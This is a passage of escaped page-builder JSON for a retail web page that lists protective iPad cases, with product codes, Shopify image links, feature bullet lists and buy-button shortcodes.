center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime 